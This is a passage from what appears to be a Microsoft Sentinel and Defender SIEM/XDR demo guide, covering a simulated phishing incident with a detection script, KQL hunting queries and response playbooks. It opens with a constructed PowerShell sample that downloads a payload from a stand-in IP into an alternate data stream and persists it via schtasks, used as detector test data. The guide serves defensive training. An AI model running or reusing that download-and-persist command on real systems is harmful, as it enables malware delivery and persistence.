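    "$u='http://203.0.113.10/u';"
    "(New-Object Net.WebClient).DownloadFile($u,'C:\\Users\\Public\\itplaceholder.txt:admin.exe');"
    "schtasks /create /tn it-update /sc onstart /tr 'C:\\Users\\Public\\itplaceholder.txt:admin.exe' /f;"
    "schtasks /run /tn it-update"
)

SAMPLE_PROCESS_EVENTS = [  # constructed
    {"DeviceName": "workstation6", "InitiatingProcessFileName": "WINWORD.EXE", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -NoP -w hidden -enc " + encode_powershell(SAMPLE_SCRIPT)},
    {"DeviceName": "workstation8", "InitiatingProcessFileName": "explorer.exe", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -enc " + encode_powershell("Get-Date")},
    {"DeviceName": "workstation6", "InitiatingProcessFileName": "WINWORD.EXE", "FileName": "splwow64.exe",
     "ProcessCommandLine": "splwow64.exe 12288"},
]

if __name__ == "__main__":
    for f in scan_process_events(SAMPLE_PROCESS_EVENTS):
        print(f["severity"].upper(), f["device"], f["parent"], "->", f["child"], f["indicators"], f["ads_targets"])
```

Decoding the encoded command before matching is the important step: the ADS path and the schtasks call are invisible in the raw command line, which is exactly why the guide sends the presenter to the script's AMSI data rather than to the process tree alone.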
Step 3: Complete investigation in Microsoft Sentinel

Demo Script Instructions


Now our investigation in Microsoft 365 Defender is done, let’s 1. Go back to Microsoft Sentinel incident
go back to Microsoft Sentinel to get more insights of this page
attack. SIEM&XDR Demo <latest date> Multi-
stage incident…
In the details of the relevant Microsoft 365 Defender incident, 2. Navigate to the Similar incidents section
we can see the list of similar incidents, which are defined by on the bottom of this page
incidents with similar entities. 3. Sort the incident by Last update time to
see the latest similar incidents
4. Scroll down and point out the similar
In the list of similar incidents, there are additional insights
incidents Sentinel has provided
provided by Microsoft Sentinel’s analytic rules, for example:
- TI map IP entity to SigninLogs (Microsoft Sentinel)
- Azure Storage FileCreated Activity from suspicious proxy IP address (Microsoft Sentinel)
- Azure Resource Manager operation from suspicious proxy IP address (Microsoft Defender for Cloud)

Let’s drill down into the alert Azure Storage FileCreated Activity from suspicious proxy IP address.

Note
If the alert is not shown under “Similar Incidents”, search for “adm_pwatkins” from the main Incidents page (Azure portal > Microsoft Sentinel > CyberSecSOC > Incidents), and make sure to select Entities as the scope of the search.

This is a Microsoft Sentinel scheduled alert. Its analytics rule was created to enrich the storage file events behind the alert Azure Resource Manager operation from suspicious proxy IP address, which was generated by Microsoft Defender for Cloud.

Under the related entities, you can see the entities we had already investigated in Microsoft 365 Defender: the blob storage account, the file, the user account, and an IP address.

In the investigation graph, once you expand the file to get Hosts where this file was mentioned, we see that the same file exists on workstation6 (Karla’s machine), where in Microsoft 365 Defender we had already traced the chain internal phish > download of the Word file > suspicious PowerShell activity.

Now we understand that a compromised user uploaded a Word file to Azure Blob Storage while connecting from a TOR IP.

Investigation insights (Attack Step 6)
Polly Watkins uploaded a malicious Word file to Azure Blob Storage from a suspicious IP; Karla Dickens later downloaded it, and its execution started the malicious activity on her workstation.
- Azure Resource: /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/simuland-assets/providers/microsoft.storage/storageaccounts/contosohotelsassets
- Storage Account: contosohotelsassets
- File: generateAccountPlan.doc
- Same file is seen on workstation6
- IP: 23.137.251.61
*Highlighted entities are subject to change for every attack execution

Now that we know the alert Azure Storage FileCreated Activity from suspicious proxy IP address belongs to the same attack, let’s add this alert to the Microsoft 365 Defender incident.

Instructions
5. Click on the Incident Id (ex. 290410) of Azure Storage FileCreated Activity from suspicious proxy IP address
6. Point out the Entities
7. Click on the Investigate button at the bottom left of this page to view the investigation graph
8. Click on the generateAccountPlan.doc icon, and select Hosts where this file was mentioned
9. Go back to the Microsoft Sentinel incident page SIEMXDR Demo <latest date> Multi-stage incident…
10. Click on adm_pwatkins@seccxpninja.onmicrosoft.com under the Entities
11. On the right pane, click on Timeline, and scroll down to find the alert name Azure Storage FileCreated Activity from suspicious proxy IP address
12. Click on the ‘+’ button to add this alert to the Microsoft 365 Defender incident
Note
- You will not see the ‘+’ button once the alert is already linked to the incident
13. Click on Tasks at the top left corner of the incident page
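The pivot we just made through the investigation graph (a blob upload from the suspicious IP, then the same file appearing on workstation6) can also be run as a single hunting query in the Microsoft Sentinel Logs blade. The query below is an added example and is not part of the demo guide or of the deployed analytic rules; it assumes that Azure Storage blob diagnostic logs are sent to the workspace (StorageBlobLogs) and that the Microsoft 365 Defender connector populates DeviceFileEvents. The entity values are the ones shown above for this attack run and change with every execution.

```kql
// Added example (not from the demo guide or its analytic rules).
// Entity values taken from this attack run; they change on every execution.
let suspicious_ip = "23.137.251.61";
let storage_account = "contosohotelsassets";
let lookback = 7d;
// 1. Blob uploads into the storage account from the suspicious IP.
//    CallerIpAddress is logged as "ip:port", so strip the port before comparing.
let uploads = StorageBlobLogs
    | where TimeGenerated > ago(lookback)
    | where AccountName =~ storage_account
    | where OperationName == "PutBlob"
    | extend CallerIp = tostring(split(CallerIpAddress, ":")[0])
    | where CallerIp == suspicious_ip
    | extend FileName = tostring(split(ObjectKey, "/")[-1])
    | project UploadTime = TimeGenerated, AccountName, ObjectKey, FileName,
              CallerIp, AuthenticationType, StatusText;
// 2. The same file name later written on any onboarded endpoint
//    (the "Hosts where this file was mentioned" expansion of the graph).
let endpoint_hits = DeviceFileEvents
    | where TimeGenerated > ago(lookback)
    | where ActionType in ("FileCreated", "FileRenamed", "FileModified")
    | project HostSeen = TimeGenerated, DeviceName, FileName, FolderPath, SHA256,
              InitiatingProcessFileName, FileOriginUrl;
uploads
| join kind=inner endpoint_hits on FileName
| where HostSeen > UploadTime            // the file reached the host after the upload
| project UploadTime, CallerIp, AccountName, ObjectKey,
          HostSeen, DeviceName, FolderPath, SHA256, InitiatingProcessFileName, FileOriginUrl
| order by HostSeen asc
```

For this run the result should contain a row with DeviceName workstation6 and, if the file was fetched through a browser, a FileOriginUrl pointing at the contosohotelsassets blob. StorageBlobLogs carries no file hash, so the join has to be on file name; once you have the SHA256 from the endpoint row, pivot on it across DeviceFileEvents and DeviceProcessEvents for a tighter match than the name alone.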
Playbook
Now that we have investigated this attack, let’s run playbooks to take response actions on this incident automatically, focusing on the Azure Storage FileCreated Activity from suspicious proxy IP address alert.

In this incident, tasks were created automatically to guide the security admin through the necessary actions. Each task’s description names the playbook to execute, so let’s start taking response actions.

Note
Microsoft Sentinel playbooks have three trigger types, and a playbook is only offered in the Run playbook pane of the object type that matches its trigger, so make sure to run each playbook from the correct place.
- Incident trigger: run from the incident
- Alert trigger: run from an alert in the incident timeline
- Entity trigger: run from an entity under Entities

1. Get User Confirmation on Incident (Alert Trigger)
First, we want the user’s confirmation on whether this suspicious activity was conducted by the user or not.
Note
Though our investigation already shows that the adm_pwatkins account is compromised, we want to showcase the option of getting user confirmation on an alert.

Playbook SIEMXDR-Request-UserConfirmation sends an email notification to the end user and their manager to get acknowledgement of the user’s activity. After execution, it completes the task and records the result as an Activity Log comment.
Note
- Follow the steps exactly, or this playbook will fail
- Playbook: “Alert Trigger”

The email requests user confirmation from the affected user Polly Watkins, her manager Dan Williams, and your own email address.
In the middle section, you can see the alert details including the entities.
At the very bottom is where you confirm, on behalf of Polly, whether it was her activity or not.

After you submit your confirmation, the playbook marks the task as completed and writes the response into the task description and the incident Activity Log.

[Screenshots: the completed Task, and the Activity Log comment]

Important steps to execute: SIEMXDR-Request-UserConfirmation playbook
1. Add a new task with the title below and click Save
   UserConfirm youralias (ex. UserConfirm tamuto)
2. Close the task pane
3. Under the Incident timeline, find the alert Azure Storage FileCreated Activity from suspicious proxy IP address
4. Click on the ellipsis icon next to the alert, and click Run playbook
5. A right pane with the list of playbooks will be shown. Search for playbook SIEMXDR-Request-UserConfirmation
6. Scroll to the very right, and click on Run to execute the playbook
7. An email will be sent to your email address (the account logged into the portal), with details and options
8. In the email, review the information and click on the No – this was not me button
9. Go back to the Microsoft Sentinel incident page, and open the task that you created. It is marked as completed, with details in the description
10. Open the Activity log at the top left (under the incident name “SIEM&XDR Demo mm-dd-yy”), and point out the new comment with the result of this playbook

2. Block Suspicious IP in Microsoft 365 Defender (Entity Trigger)
Our investigation identified 20.127.144.13 as the phishing website, so let’s block the IP in Microsoft Defender for Endpoint.

Playbook SIEMXDR-Block-IP-Entity-M365D adds the specified IP as a Microsoft Defender for Endpoint indicator and adds the result to the Activity Log.
Note
- Playbook: “Entity Trigger”
- For demo purposes, the playbook creates the IP indicator with the “Audit” response action. An Audit indicator only raises an alert when a device connects to the IP; it does not block the connection. In production, use “Block” to actually cut off access.

Important steps to execute: SIEMXDR-Block-IP-Entity-M365D
1. In the Microsoft Sentinel incident page, find IP Address 20.127.144.13 under Entities
2. Click on the ellipsis icon next to the entity, and click Run playbook
3. A right pane with the list of playbooks will be shown. Search for playbook SIEMXDR-Block-IP-Entity-M365D
4. Scroll to the very right, and click on Run to execute the playbook
5. Open the Activity log at the top left (under the incident name “SIEM&XDR Demo mm-dd-yy”), and point out the new comment with the result of this playbook

3. Delete File from Blob Storage (Alert Trigger)
We identified generateAccountPlan.doc as the initial malicious file that launched the backdoor, so let’s delete the file from Azure Storage.

Playbook SIEMXDR-Delete-FilefromBlobStorage-Alert deletes the related file from the Azure Storage account associated with the incident and adds the result to the Activity Log.
Note
- Playbook: “Alert Trigger”
- The playbook deletes the specified file from blob storage
- If the file has already been deleted, this is reported in the Activity Log

Important steps to execute: SIEMXDR-Delete-FilefromBlobStorage-Alert
1. Under the Incident timeline, find the alert Azure Storage FileCreated Activity from suspicious proxy IP address
2. Click on the ellipsis icon next to the alert, and click Run playbook
3. A right pane with the list of playbooks will be shown. Search for playbook SIEMXDR-Delete-FilefromBlobStorage-Alert
4. Scroll to the very right, and click on Run to execute the playbook
5. Open the Activity log at the top left (under the incident name “SIEM&XDR Demo mm-dd-yy”), and point out the new comment with the result of this playbook
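After running the three playbooks, an analyst would want to confirm their effects rather than rely on the Activity Log comment alone. The query below is an added example, not part of the demo guide or of the playbooks; it assumes StorageBlobLogs and the Microsoft 365 Defender DeviceNetworkEvents table are in the workspace and uses the entity values from this run. It checks that the DeleteBlob operation actually happened for generateAccountPlan.doc and, because the IP indicator was created in Audit mode, surfaces any endpoint connections to 20.127.144.13 that still succeeded after the playbook ran.

```kql
// Added example (not from the demo guide or its playbooks).
let phish_ip = "20.127.144.13";
let malicious_file = "generateAccountPlan.doc";
let since = ago(1d);   // adjust to the time the playbooks were run
// Was the blob really deleted? The playbook's identity appears as the caller.
let deletions = StorageBlobLogs
    | where TimeGenerated > since
    | where OperationName == "DeleteBlob" and ObjectKey endswith malicious_file
    | project TimeGenerated,
              Check = "blob deleted",
              Detail = strcat(StatusText, " ", ObjectKey),
              Actor = tostring(split(CallerIpAddress, ":")[0]);
// An "Audit" indicator only alerts; connections still succeed, so any rows here
// mean the phishing site stays reachable until the indicator is set to Block.
let still_reaching = DeviceNetworkEvents
    | where TimeGenerated > since
    | where RemoteIP == phish_ip
    | project TimeGenerated,
              Check = "endpoint still reached phishing IP (indicator is Audit, not Block)",
              Detail = strcat(InitiatingProcessFileName, " -> ", RemoteUrl, ":", tostring(RemotePort)),
              Actor = DeviceName;
union deletions, still_reaching
| order by TimeGenerated asc
```

A healthy result shows exactly one "blob deleted" row with a success StatusText and no "still reached" rows; if deletions is empty, check the playbook run history in Logic Apps rather than assuming the Activity Log comment reflects a successful delete.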

Step 4: Resolve incident in Microsoft Sentinel

Demo Script
After we have conducted all the necessary steps for this incident, we can close it.

Once the Microsoft Sentinel incident is closed, its status is synced to Microsoft 365 Defender and Microsoft Defender for Cloud.

Instructions
Note
- DO NOT conduct this step

Conclusion
In this demo, we have demonstrated the value of Microsoft 365 Defender, together with Microsoft Sentinel,
allowing security teams to effectively monitor and hunt for incidents in their environment and take action to
prevent attacks from recurring.

For more information about the integration of Microsoft 365 Defender with Microsoft Sentinel, and for resources to help you demonstrate the value to your customers, see Microsoft 365 Defender integration with Microsoft Sentinel | Microsoft Learn.

Additional resources available include:

Microsoft 365 Defender and Sentinel - Better together:

 An interactive guide to detect and respond to modern attacks with unified SIEM and XDR capabilities
 Microsoft 365 Defender integration with Microsoft Sentinel
 Join our Microsoft Security Community

Microsoft 365:

 An interactive guide to show how users can Protect their organization with Microsoft 365 Defender
 Security Resources for Microsoft 365 Defender including white papers and webinars
 Microsoft 365 Defender Blog and Tech Community

Microsoft Sentinel:

 Microsoft Sentinel Blog - Microsoft Community Hub
 Microsoft Sentinel skill-up training. From Zero to Hero in 21 modules
 Become a Microsoft Sentinel Ninja: The complete level 400 training

